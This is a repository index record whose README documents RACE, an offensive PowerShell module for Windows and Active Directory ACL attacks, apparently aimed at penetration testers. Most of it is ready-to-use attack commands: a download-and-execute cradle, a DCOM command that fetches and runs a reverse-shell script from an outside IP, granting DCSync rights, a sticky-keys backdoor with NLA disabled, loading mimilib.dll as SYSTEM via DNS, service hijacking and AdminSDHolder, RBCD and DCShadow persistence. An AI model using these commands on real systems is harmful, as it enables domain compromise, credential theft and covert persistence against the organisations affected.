{"id":13712378,"url":"https://github.com/samratashok/RACE","last_synced_at":"2025-05-06T22:31:09.043Z","repository":{"id":54880877,"uuid":"198853198","full_name":"samratashok/RACE","owner":"samratashok","description":"RACE is a PowerShell module for executing ACL attacks against Windows targets.","archived":false,"fork":false,"pushed_at":"2023-05-05T15:33:54.000Z","size":92,"stargazers_count":219,"open_issues_count":2,"forks_count":61,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-04-03T03:09:26.210Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/samratashok.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-07-25T15:04:58.000Z","updated_at":"2025-04-02T10:00:44.000Z","dependencies_parsed_at":"2022-08-14T05:31:20.209Z","dependency_job_id":"71ad0c1b-fcf2-4cf4-bd0b-7e57933e9171","html_url":"https://github.com/samratashok/RACE","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/samratashok%2FRACE","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/samratashok%2FRACE/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/samratashok%2FRACE/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/samratashok%2FRACE/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/samratashok","download_url":"https://codeload.github.com/samratashok/RACE/tar.gz/refs/heads/master","host":{"na
me":"GitHub","url":"https://github.com","kind":"github","repositories_count":252778973,"owners_count":21802860,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T23:01:17.791Z","updated_at":"2025-05-06T22:31:08.776Z","avatar_url":"https://github.com/samratashok.png","language":"PowerShell","funding_links":[],"categories":["Enable DSRM Admin Login"],"sub_categories":["Remove protections such as PPL and bypass Credential Guard"],"readme":"# RACE\n### RACE is a PowerShell module for executing ACL attacks against Windows targets and Active Directory. RACE can be used for persistence and on-demand privilege escalation on Windows machines. \n### By [nikhil_mitt](https://twitter.com/nikhil_mitt)\n\n### Usage\n\nNote that RACE is a tool which is used after you already have admin or DA (in case of a DC) privileges. \nThe introductory blog post is available here: https://www.labofapenetrationtester.com/2019/08/race.html\n\nImport the module in the current PowerShell session\n```powershell\nPS C:\\\u003e Import-Module C:\\RACE-master\\RACE.psd1\n```\nUse dot sourcing\n```powershell\nPS C:\\\u003e . C:\\RACE-master\\RACE.ps1\n```\nDownload and execute\n```powershell\niex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/RACE/master/RACE.ps1')\n```\n\nGet help about any function\n```powershell\nPS C:\\\u003e Get-Help Set-DCPermissions -Full\n```\n### Functions\n\nNote that the functions Set-ADACL and Set-DCPermissions need the Microsoft ActiveDirectory module. 
You can get it from a DC or from my GitHub: https://github.com/samratashok/ADModule\n\n### Set-RemotePSRemoting\nUse this function to modify the ACL of the PowerShell Remoting endpoint so that you can access the target machine without admin.\n```powershell\nPS C:\\\u003e Set-RemotePSRemoting -SamAccountName labuser -ComputerName ops-dc\n```\nUse the above command to add permissions on the remote machine for labuser to access PowerShell remoting.\n\n```powershell\nPS C:\\\u003e Set-RemotePSRemoting -SamAccountName labuser -ComputerName ops-dc -Credential ops\\administrator\n```\nUse the above command to add permissions on the remote machine for labuser to access PowerShell remoting using explicit credentials.\n\n### Set-RemoteWMI\nUse this function to modify the ACL of the DCOM endpoint and all the WMI namespaces so that you can access the target machine without admin.\n```powershell\nPS C:\\\u003e Set-RemoteWMI -SamAccountName labuser -ComputerName ops-dc\n```\nUse the above command to add permissions on the remote machine for labuser to access WMI.\n\n### Set-RemoteServicePermissions and Set-RemoteServiceAbuse\nUse these to modify ACLs of services on Windows machines. \n\n```powershell\nPS C:\\\u003e Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-mssql -ServiceName ALG -Verbose\n```\nUse the above command to modify the ACL of the 'ALG' service on ops-mssql to allow labuser to modify the service (gives 'CCDCLCSWRPWPDTLOCRSDRCWDWO' rights).\n\n```powershell\nPS C:\\\u003e Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'labuser' -ServiceName ALG -Verbose\n```\nRun the above command as 'labuser' to configure ALG to run as SYSTEM and modify its executable path to add 'labuser'\nor the other Principal provided in the UserName parameter to the local administrators group on the target machine. 
\n\n```powershell\nPS C:\\\u003e sc.exe \\\\ops-mssql start ALG\n```\nRun the above command as 'labuser' to execute the payload set as the executable of ALG.\n\n### Set-RemoteRegistryPermissions\nFunction which can be used to modify permissions of Remote Registry by modifying a registry key on the local or a remote machine.\n\n```powershell\nPS C:\\\u003e Set-RemoteRegistryPermissions -SamAccountName labuser -ComputerName ops-mssql -Verbose \n```\nUse the above command to modify permissions of the 'Remote Registry' key on the target machine to allow 'labuser' \naccess to Remote Registry. \n\n### Set-RegistryImageFileExecution and Invoke-RegistryAbuse\nSet-RegistryImageFileExecution modifies the permissions for the registry keys 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options' and 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp'.\n\n```powershell\nPS C:\\\u003e Set-RegistryImageFileExecution -SamAccountName labuser -ComputerName ops-mssql -Verbose \n```\nUse the above command to modify permissions of the 'Image File Execution Options' key on the target machine to allow 'labuser' \npermissions to modify the key and its subkeys. 
\n```powershell\nPS C:\\\u003e Invoke-RegistryAbuse -ComputerName ops-mssql -Method ImageFileExecution -Verbose \n```\nThe above command sets the payload for sethc (sticky keys) and disables NLA.\n\n### Set-DCOMPermissions and Invoke-DCOMAbuse\nSet-DCOMPermissions can be used to modify ACLs of DCOM to provide non-admin Principals access to DCOM.\n\n```powershell\nPS C:\\\u003e Set-DCOMPermissions -UserName labuser -ComputerName ops-mssql -Verbose \n```\nUse the above command to add permissions on the target machine for labuser to execute commands using DCOM.\nThen use Invoke-DCOMAbuse as labuser to run commands:\n```powershell\nInvoke-DCOMAbuse -ComputerName ops-build -Method MMC20 -Arguments 'iex(iwr -UseBasicParsing http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)'\n```\n\n### Set-JEAPermissions\nFunction which can be used to create a new JEA endpoint for PowerShell remoting to provide access for non-admin Principals. \n```powershell\nPS C:\\\u003e Set-JEAPermissions -ComputerName ops-build -SamAccountName labuser -Verbose \n```\nUse the above command to create a new JEA endpoint on the target machine which provides administrator privileges. \n\nUse the below command to connect to the target machine. Note the -ConfigurationName parameter:\n```powershell\nPS C:\\\u003e Enter-PSSession -ComputerName ops-build -ConfigurationName microsoft.powershell64 \n```\n\n### Set-ADACL\nThe function can set the ACL of a domain object specified by TargetSamAccountName or DistinguishedName.\n\nIt requires Microsoft's Active Directory module. 
You either need the AD RSAT tools (available on a DC) or get the module \nfrom here: https://github.com/samratashok/ADModule\n\n```powershell\nPS C:\\\u003e Set-ADACL -SamAccountName labuser -DistinguishedName 'DC=powershell,DC=local' -GUIDRight DCSync -Server powershell.local -Verbose\n```\nUse the above command to modify the ACL of the domain object powershell.local to add DCSync rights for 'labuser'.\n\n### Set-DNSAbusePermissions and Invoke-DNSAbuse\nUse Set-DNSAbusePermissions to modify the ACL of the DNS Server object and the permissions for the DNS service.\n```powershell\nPS C:\\\u003e Set-DNSAbusePermissions -SAMAccountName labuser -DistinguishedName 'CN=MicrosoftDNS,CN=System,DC=offensiveps,DC=powershell,DC=local' -ComputerName ops-dc -Verbose\n```\nUse the above command to modify the ACL of the DNS Server to add permissions for labuser so that it can remotely load DLLs as SYSTEM on the DNS Server.\n\nUse the below command (needs the DNS Server module that is available with DNS RSAT) to load the DLL.\n```powershell\nPS C:\\\u003e Invoke-DNSAbuse -ComputerName ops-dc -DLLPath \\\\ops-build\\dll\\mimilib.dll -Verbose \n```\n\n### Set-DCPermissions\nFunction to modify the ACL of domain objects for specific attacks.\n```powershell\nSet-DCPermissions -Method AdminSDHolder -SAMAccountName labuser -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' -Verbose \n```\nUse the above command to modify the ACL of AdminSDHolder to allow labuser permissions to modify the ACL of AdminSDHolder.\nUsing these permissions, labuser can change the ACL of AdminSDHolder and get rights over all the Protected Groups.\n\n```powershell\nSet-DCPermissions -Method RBCD -DistinguishedName 'CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=local' -SAMAccountName labuser -Verbose \n```\nUse the above command to modify the ACL of the OPS-FILE$ user to add permissions for labuser to configure Resource-based Constrained Delegation.\n\n### Set-DCShadowPermissions\nFunction to modify ACL of multiple 
domain objects to allow DCShadow execution without Domain Admin privileges.\n\n```powershell\nPS C:\\\u003e Set-DCShadowPermissions -FakeDC emptest -SAMAccountName testuser -Username privuser -Verbose \n```\nUse the above command to modify ACLs to run DCShadow from the ps-paw machine as privuser against testuser.\n\n### Bugs, Feedback and Feature Requests\nPlease raise an issue if you encounter a bug or have a feature request.\n\n### Contributing\nYou can contribute by fixing bugs or contributing to the code. If you cannot code, please use the tool and provide feedback and bug reports!\n\n### Supporting material\n\nThe introductory blog post is available here: https://www.labofapenetrationtester.com/2019/08/race.html\n\nThe above post contains slides and videos for the DEF CON 27 talk for this tool.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsamratashok%2FRACE","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsamratashok%2FRACE","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsamratashok%2FRACE/lists"}